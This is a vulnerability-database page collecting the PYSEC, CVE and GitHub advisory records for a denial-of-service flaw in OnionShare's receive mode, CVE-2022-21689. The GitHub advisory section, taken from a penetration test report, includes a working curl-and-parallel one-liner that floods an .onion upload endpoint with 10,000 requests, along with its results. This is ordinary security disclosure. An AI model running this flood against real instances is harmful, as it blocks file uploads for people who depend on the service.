Vulnerability-Lookup

PYSEC-2022-40

Vulnerability from pysec - Published: 2022-01-18 22:15 - Updated: 2022-03-09 00:16

Details

OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.

Impacted products

Name	purl
onionshare-cli	pkg:pypi/onionshare-cli

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "onionshare-cli",
        "purl": "pkg:pypi/onionshare-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.3",
        "2.3.1",
        "2.3.2",
        "2.3.3"
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21689",
    "GHSA-jh82-c5jw-pxpc"
  ],
  "details": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.",
  "id": "PYSEC-2022-40",
  "modified": "2022-03-09T00:16:43.116991Z",
  "published": "2022-01-18T22:15:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
    }
  ]
}

CVE-2022-21689 (GCVE-0-2022-21689)

Vulnerability from cvelistv5 – Published: 2022-01-18 22:10 – Updated: 2025-04-23 19:10

Title

Denial of Service in Onionshare

Summary

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Assigner

GitHub_M

References

URL

Tags

	https://github.com/onionshare/onionshare/releases…	x_refsource_MISC
	https://github.com/onionshare/onionshare/security…	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	onionshare	onionshare	Affected: < 2.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T02:46:39.394Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-21689",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-23T15:58:07.839548Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-23T19:10:29.213Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "onionshare",
          "vendor": "onionshare",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-01-18T22:10:10.000Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
        }
      ],
      "source": {
        "advisory": "GHSA-jh82-c5jw-pxpc",
        "discovery": "UNKNOWN"
      },
      "title": "Denial of Service in Onionshare",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2022-21689",
          "STATE": "PUBLIC",
          "TITLE": "Denial of Service in Onionshare"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "onionshare",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "\u003c 2.5"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "onionshare"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-400: Uncontrolled Resource Consumption"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/onionshare/onionshare/releases/tag/v2.5",
              "refsource": "MISC",
              "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
            },
            {
              "name": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc",
              "refsource": "CONFIRM",
              "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
            }
          ]
        },
        "source": {
          "advisory": "GHSA-jh82-c5jw-pxpc",
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2022-21689",
    "datePublished": "2022-01-18T22:10:10.000Z",
    "dateReserved": "2021-11-16T00:00:00.000Z",
    "dateUpdated": "2025-04-23T19:10:29.213Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-JH82-C5JW-PXPC

Vulnerability from github – Published: 2022-01-21 23:20 – Updated: 2024-10-08 12:36

Summary

Denial of Service in Onionshare

Details

Between September 26, 2021 and October 8, 2021, Radically Open Security conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund's Red Team lab.

Vulnerability ID: OTF-012
Vulnerability type: Denial of Service
Threat level: Moderate

Description:

The receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script.

Technical description:

The following script uses GNU parallel and curl with around 6000 requests in parallel to send 10000 requests. A change in the ulimit -n configuration is required for it to work. This is sufficient to block file upload on a (public) receive instance.

seq 10000 | parallel --max-args 0 --jobs 6000 "curl -i -s -x socks5h://localhost:9150 -k -X $'POST' -H $'Host: csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------19182376703918074873375387042' -H $'Content-Length: 329' -H $'Connection: close' --data-binary $'-----------------------------19182376703918074873375387042\x0d\x0aContent-Disposition: form-data; name=\"file[]\"; filename=\"poc.txt\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aA\x0d\x0a-----------------------------19182376703918074873375387042\x0d\x0aContent-Disposition: form-data; name=\"text\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------19182376703918074873375387042--\x0d\x0a' $'http://csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion/upload-ajax'"

Attack duration was around 80 seconds.

Cases where over 99 requests were sent per second:

Every 0.1s: ls | grep...   onionvm: Tue Oct 5 12:17:00 2021
78

Cases where files were successfully written to disk:

Every 0.1s: ls | wc -w   onionvm: Tue Oct 5 12:17:00 2021
8399

This means that during the attack time 1601 requests of 10000 were dropped. We tried to upload multiple files in the web interface during the attack and were not successful.

The failsafe is used to prevent creating more than 100 directories per second:

https://github.com/onionshare/onionshare/blob/d08d5f0f32f755f504494d80794886f346fbafdb/cli/onionshare_cli/web/receive_mode.py#L386-L427

The limit of 100 requests/second is significantly lower than the possible network bandwidth and greatly reduces the attack complexity for denial of service. Our test was conducted over the tor network, which showed no limitation for the required bandwidth.

Impact:

An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.

Recommendation:

Remove this limitation, or
Derive directory name from milliseconds

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "onionshare-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21689"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-19T18:48:07Z",
    "nvd_published_at": "2022-01-18T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "Between September 26, 2021 and October 8, 2021, [Radically Open Security](https://www.radicallyopensecurity.com/) conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund\u0027s [Red Team lab](https://www.opentech.fund/labs/red-team-lab/).\n\n- Vulnerability ID: OTF-012\n- Vulnerability type: Denial of Service\n- Threat level: Moderate\n\n## Description:\n\nThe receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script.\n\n## Technical description:\n\nThe following script uses GNU parallel and curl with around 6000 requests in parallel to send 10000 requests. A change in the `ulimit -n` configuration is required for it to work. This is sufficient to block file upload on a (public) receive instance.\n\n```\nseq 10000 | parallel --max-args 0 --jobs 6000 \"curl -i -s -x socks5h://localhost:9150 -k -X $\u0027POST\u0027 -H $\u0027Host: csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion\u0027 -H $\u0027Accept-Encoding: gzip, deflate\u0027 -H $\u0027Content-Type: multipart/form-data; boundary=---------------------------19182376703918074873375387042\u0027 -H $\u0027Content-Length: 329\u0027 -H $\u0027Connection: close\u0027 --data-binary $\u0027-----------------------------19182376703918074873375387042\\x0d\\x0aContent-Disposition: form-data; name=\\\"file[]\\\"; filename=\\\"poc.txt\\\"\\x0d\\x0aContent-Type: text/plain\\x0d\\x0a\\x0d\\x0aA\\x0d\\x0a-----------------------------19182376703918074873375387042\\x0d\\x0aContent-Disposition: form-data; name=\\\"text\\\"\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a-----------------------------19182376703918074873375387042--\\x0d\\x0a\u0027 $\u0027http://csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion/upload-ajax\u0027\"\n```\n\nAttack duration was around 80 seconds.\n\nCases where over 99 requests were sent per second:\n\n```\nEvery 0.1s: ls | grep...   onionvm: Tue Oct 5 12:17:00 2021\n78\n```\n\nCases where files were successfully written to disk:\n\n```\nEvery 0.1s: ls | wc -w   onionvm: Tue Oct 5 12:17:00 2021\n8399\n```\n\nThis means that during the attack time 1601 requests of 10000 were dropped. We tried to upload multiple files in the web interface during the attack and were not successful.\n\nThe failsafe is used to prevent creating more than 100 directories per second:\n\nhttps://github.com/onionshare/onionshare/blob/d08d5f0f32f755f504494d80794886f346fbafdb/cli/onionshare_cli/web/receive_mode.py#L386-L427\n\nThe limit of 100 requests/second is significantly lower than the possible network bandwidth and greatly reduces the attack complexity for denial of service. Our test was conducted over the tor network, which showed no limitation for the required bandwidth.\n\n## Impact:\n\nAn adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.\n\n## Recommendation:\n\n- Remove this limitation, or\n- Derive directory name from milliseconds\n",
  "id": "GHSA-jh82-c5jw-pxpc",
  "modified": "2024-10-08T12:36:56Z",
  "published": "2022-01-21T23:20:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21689"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onionshare-cli/PYSEC-2022-40.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Denial of Service in Onionshare"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2022-40

CVE-2022-21689 (GCVE-0-2022-21689)

GHSA-JH82-C5JW-PXPC

Description:

Technical description:

Impact:

Recommendation:

Tags

Sightings

Nomenclature